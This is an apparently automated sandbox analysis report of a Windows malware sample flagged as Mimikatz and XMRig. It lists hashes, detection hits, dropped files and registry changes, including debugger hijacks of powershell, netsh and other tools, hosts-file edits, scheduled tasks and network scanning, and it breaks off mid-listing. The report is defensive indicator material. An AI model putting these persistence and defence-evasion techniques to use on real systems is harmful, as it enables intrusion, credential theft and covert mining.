Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
02/05/2024, 04:32
Behavioral task
behavioral1
Sample
2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe
Resource
win7-20240419-en
General
-
Target
2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe
-
Size
7.5MB
-
MD5
97247f61fafc2c9a646132fc7a2ebea2
-
SHA1
84df007da5637448a22d41fa0cc58f30cac64c6a
-
SHA256
30b3a72d0b0b1297e043bec98a5675977ceba169ffa696c8eb5aebef52984a31
-
SHA512
f698b4333988e4489f10089e2da349b6f102346cfc0d728a26ffdba1da110c9bbd226949d87bdf96e251625f8318eca54ecb97b40bae83ccc4de9bcf99946d5c
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1176 created 1748 1176 fbnhtsh.exe 37 -
Contacts a large (30937) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/4292-137-0x00007FF698560000-0x00007FF69864E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 40 IoCs
resource yara_rule behavioral2/memory/4720-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/4720-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x000a000000023b97-6.dat UPX behavioral2/memory/4848-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x000a000000023bd9-134.dat UPX behavioral2/memory/4292-137-0x00007FF698560000-0x00007FF69864E000-memory.dmp UPX behavioral2/files/0x000a000000023be4-149.dat UPX behavioral2/memory/4256-151-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/4256-159-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/files/0x000a000000023be1-163.dat UPX behavioral2/memory/3940-164-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/2392-170-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/512-174-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/2796-178-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/3940-181-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/3532-183-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/4556-187-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/4008-191-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/3940-193-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/2236-196-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/3940-199-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/1312-201-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/3972-205-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/1892-209-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/3940-211-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/1732-214-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/3940-217-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/2144-219-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/2700-223-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/1444-230-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/4268-232-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/3940-233-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/3664-235-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/3336-237-0x00007FF729690000-0x00007FF7296EB000-memory.dmp UPX behavioral2/memory/3940-248-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/3940-250-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/3940-253-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/3940-305-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/3940-311-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX behavioral2/memory/3940-314-0x00007FF78F230000-0x00007FF78F350000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/3940-181-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-193-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-199-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-211-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-217-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-233-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-248-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-250-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-253-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-305-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-311-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig behavioral2/memory/3940-314-0x00007FF78F230000-0x00007FF78F350000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4720-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4720-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000a000000023b97-6.dat mimikatz behavioral2/memory/4848-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4292-137-0x00007FF698560000-0x00007FF69864E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts fbnhtsh.exe File opened for modification C:\Windows\system32\drivers\etc\hosts fbnhtsh.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4460 netsh.exe 4292 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe fbnhtsh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe fbnhtsh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe fbnhtsh.exe -
Executes dropped EXE 29 IoCs
pid Process 4848 fbnhtsh.exe 1176 fbnhtsh.exe 4608 wpcap.exe 3612 lpcfaazhb.exe 4292 vfshost.exe 4832 xohudmc.exe 4256 jgannnvah.exe 4824 lqrjma.exe 3940 blbkgb.exe 2392 jgannnvah.exe 512 jgannnvah.exe 2796 jgannnvah.exe 3532 jgannnvah.exe 4556 jgannnvah.exe 4008 jgannnvah.exe 2236 jgannnvah.exe 1312 jgannnvah.exe 3972 jgannnvah.exe 1892 jgannnvah.exe 1732 jgannnvah.exe 2144 jgannnvah.exe 2700 jgannnvah.exe 1908 fbnhtsh.exe 1444 jgannnvah.exe 4268 jgannnvah.exe 3664 jgannnvah.exe 3336 jgannnvah.exe 8 bjbduvwai.exe 5764 fbnhtsh.exe -
Loads dropped DLL 12 IoCs
pid Process 4608 wpcap.exe 4608 wpcap.exe 4608 wpcap.exe 4608 wpcap.exe 4608 wpcap.exe 4608 wpcap.exe 4608 wpcap.exe 4608 wpcap.exe 4608 wpcap.exe 3612 lpcfaazhb.exe 3612 lpcfaazhb.exe 3612 lpcfaazhb.exe -
resource yara_rule behavioral2/files/0x000a000000023bd9-134.dat upx behavioral2/memory/4292-137-0x00007FF698560000-0x00007FF69864E000-memory.dmp upx behavioral2/files/0x000a000000023be4-149.dat upx behavioral2/memory/4256-151-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/4256-159-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/files/0x000a000000023be1-163.dat upx behavioral2/memory/3940-164-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/2392-170-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/512-174-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/2796-178-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/3940-181-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/3532-183-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/4556-187-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/4008-191-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/3940-193-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/2236-196-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/3940-199-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/1312-201-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/3972-205-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/1892-209-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/3940-211-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/1732-214-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/3940-217-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/2144-219-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/2700-223-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/1444-230-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/4268-232-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/3940-233-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/3664-235-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/3336-237-0x00007FF729690000-0x00007FF7296EB000-memory.dmp upx behavioral2/memory/3940-248-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/3940-250-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/3940-253-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/3940-305-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/3940-311-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx behavioral2/memory/3940-314-0x00007FF78F230000-0x00007FF78F350000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 ifconfig.me 87 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\lqrjma.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 fbnhtsh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies fbnhtsh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData fbnhtsh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 fbnhtsh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 fbnhtsh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 fbnhtsh.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\lqrjma.exe xohudmc.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE fbnhtsh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft fbnhtsh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache fbnhtsh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content fbnhtsh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 fbnhtsh.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\ivullanlc\Corporate\mimilib.dll fbnhtsh.exe File opened for modification C:\Windows\ivullanlc\Corporate\log.txt cmd.exe File created C:\Windows\ivullanlc\lgbbybeij\lpcfaazhb.exe fbnhtsh.exe File created C:\Windows\ivullanlc\lgbbybeij\Packet.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\crli-0.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\libxml2.dll fbnhtsh.exe File created C:\Windows\ivullanlc\lgbbybeij\ip.txt fbnhtsh.exe File opened for modification C:\Windows\zpnzavhu\fbnhtsh.exe 2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\zpnzavhu\schoedcl.xml fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\docmicfg.xml fbnhtsh.exe File created C:\Windows\zpnzavhu\schoedcl.xml fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\svschost.xml fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\posh-0.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\AppCapture32.dll fbnhtsh.exe File created C:\Windows\zpnzavhu\vimpcsvc.xml fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\Shellcode.ini fbnhtsh.exe File created C:\Windows\ivullanlc\lgbbybeij\wpcap.exe fbnhtsh.exe File created C:\Windows\ivullanlc\lgbbybeij\wpcap.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\cnli-1.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\tibe-2.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\tucl-1.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\ucl.dll fbnhtsh.exe File created C:\Windows\ivullanlc\lgbbybeij\scan.bat fbnhtsh.exe File created C:\Windows\ivullanlc\upbdrjv\swrpwe.exe fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\schoedcl.exe fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\vimpcsvc.xml fbnhtsh.exe File created C:\Windows\zpnzavhu\fbnhtsh.exe 2024-05-02_97247f61fafc2c9a646132fc7a2ebea2_hacktools_icedid_mimikatz.exe File created C:\Windows\ivullanlc\UnattendGC\svschost.xml fbnhtsh.exe File created C:\Windows\ime\fbnhtsh.exe fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\libeay32.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\vimpcsvc.xml fbnhtsh.exe File created C:\Windows\zpnzavhu\spoolsrv.xml fbnhtsh.exe File created C:\Windows\zpnzavhu\docmicfg.xml fbnhtsh.exe File opened for modification C:\Windows\zpnzavhu\svschost.xml fbnhtsh.exe File opened for modification C:\Windows\zpnzavhu\vimpcsvc.xml fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\ssleay32.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\docmicfg.xml fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\spoolsrv.xml fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\schoedcl.xml fbnhtsh.exe File opened for modification C:\Windows\zpnzavhu\spoolsrv.xml fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\AppCapture64.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\xdvl-0.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\spoolsrv.exe fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\schoedcl.xml fbnhtsh.exe File created C:\Windows\ivullanlc\Corporate\vfshost.exe fbnhtsh.exe File opened for modification C:\Windows\ivullanlc\lgbbybeij\Packet.dll fbnhtsh.exe File created C:\Windows\ivullanlc\lgbbybeij\bjbduvwai.exe fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\svschost.exe fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\vimpcsvc.exe fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\spoolsrv.xml fbnhtsh.exe File opened for modification C:\Windows\ivullanlc\lgbbybeij\Result.txt bjbduvwai.exe File created C:\Windows\ivullanlc\UnattendGC\specials\exma-1.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\trch-1.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\trfo-2.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\docmicfg.exe fbnhtsh.exe File created C:\Windows\zpnzavhu\svschost.xml fbnhtsh.exe File created C:\Windows\ivullanlc\Corporate\mimidrv.sys fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\coli-0.dll fbnhtsh.exe File created C:\Windows\ivullanlc\UnattendGC\specials\zlib1.dll fbnhtsh.exe File opened for modification C:\Windows\zpnzavhu\docmicfg.xml fbnhtsh.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1200 sc.exe 2180 sc.exe 788 sc.exe 4620 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b97-6.dat nsis_installer_2 behavioral2/files/0x0014000000023b9d-15.dat nsis_installer_1 behavioral2/files/0x0014000000023b9d-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1604 schtasks.exe 2364 schtasks.exe 640 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ fbnhtsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fbnhtsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" fbnhtsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgannnvah.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" 